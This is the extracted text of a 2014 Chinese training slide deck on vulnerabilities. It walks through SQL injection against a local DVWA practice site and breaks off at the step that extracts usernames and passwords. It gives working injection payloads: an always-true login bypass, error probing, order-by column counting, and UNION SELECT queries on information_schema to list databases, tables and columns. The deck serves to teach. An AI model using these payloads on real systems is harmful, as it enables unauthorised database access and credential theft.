漏洞的艺术讲述.pptx

漏洞的艺术 暑期交流 2014-8-10 提纲 引言 SQL注入 SQLMAP 缓冲区溢出 Metasploit 引言 提供web服务的网络服务器 开放网络服务的主机 运行特定软件的主机 SQL注入 SQL注入原理 SQL注入原理 SQL注入是从正常的WWW端口访问，而且表面看起来跟一般的Web页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看web服务器日志的习惯，可能被入侵很长时间都不会发觉。 SQL注入原理 最简单的SQL注入实例 假设这么一个情景，一个网页的后台入口处需要验证用户名和密码，验证程序的SQL语句是这样写： Select * from admin where user=‘TxtBox1.txt’ and pass=‘TxtBox2.txt’ 最简单的SQL注入实例 如果用户填写的用户名和密码都是: ‘abc’ or ‘1’=‘1’ 那么将导致SQL语句是： Select * from admin where user=‘abc’ or ‘1’=‘1’ and pass= =‘abc’ or ‘1’=‘1’ 这条语句是永真式，那么攻击者就成功登陆了后台。这就是最简单的SQL注入方式。 SQL注入过程 (1).寻找可能存在SQL注入漏洞的链接 (2).测试该网站是否有SQL注入漏洞 (3).获取数据库和表信息 (4).获取表中的字段信息 (5).获取用户名和密码 为了便于演示和练习，准备了漏洞网站 访问http://localhost/DVWA/即可 寻找可能存在SQL注入漏洞的链接 我们找的链接是： http://localhost/DVWA/vulnerabilities/sqli/?id1Submit=Submit# 测试该链接是否有SQL注入漏洞 (1)在参数末尾加’ http://localhost/DVWA/vulnerabilities/sqli/?id=1%27Submit=Submit# 结果如下： ------------------------------------- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 1 at line 1 ------------------------------------- 该信息说明：后台数据库是MySQL 。 测试该链接是否有SQL注入漏洞 (2)在参数末尾加 and 1=2 和 and 1=1 前者返回信息：该栏目无内容，将返回上一页；后者正常返回； (3)在参数末尾加 ‘ order by n +--+ 和‘ order by n+1 +--+ 等 获取结果集字段个数，当n=3时返回Unknown column ‘3’ in ‘order clause’，说明结果集字段个数为2 由此说明该网站存在sql注入漏洞，有很大把握可得到用户名和密码。 获取数据库和表信息 在参数末尾加上： union select user(),database() +--+Submit=Submit# 。 意思是通过mysql数据库的函数获得数据库名 页面返回预期的数据。 ID: union select user(),database() -- First name: root@localhost Surname: dvwa 获取数据库和表信息 在参数末尾加上 union select 1,TABLE_NAME from information_schema.tables where TABLE_SCHEMA=dvwa 意思是获得数据库中的表明 页面返回预期的数据。 ID: union select 1,TABLE_NAME from information_schema.tables where TABLE_SCHEMA=dvwa -- First name: 1 Surname: users 获取表中的字段信息 在参数末尾加上union select 1,COLUMN_NAME from information_schema.columns where table_name=users +--+ 意思是获得数据库表中的字段信息 页面返回预期的数据。 First name: 1 Surname: user_id ………………………….. First name: 1 Surname: password 获取用户名和密码 在参数末尾加上union select us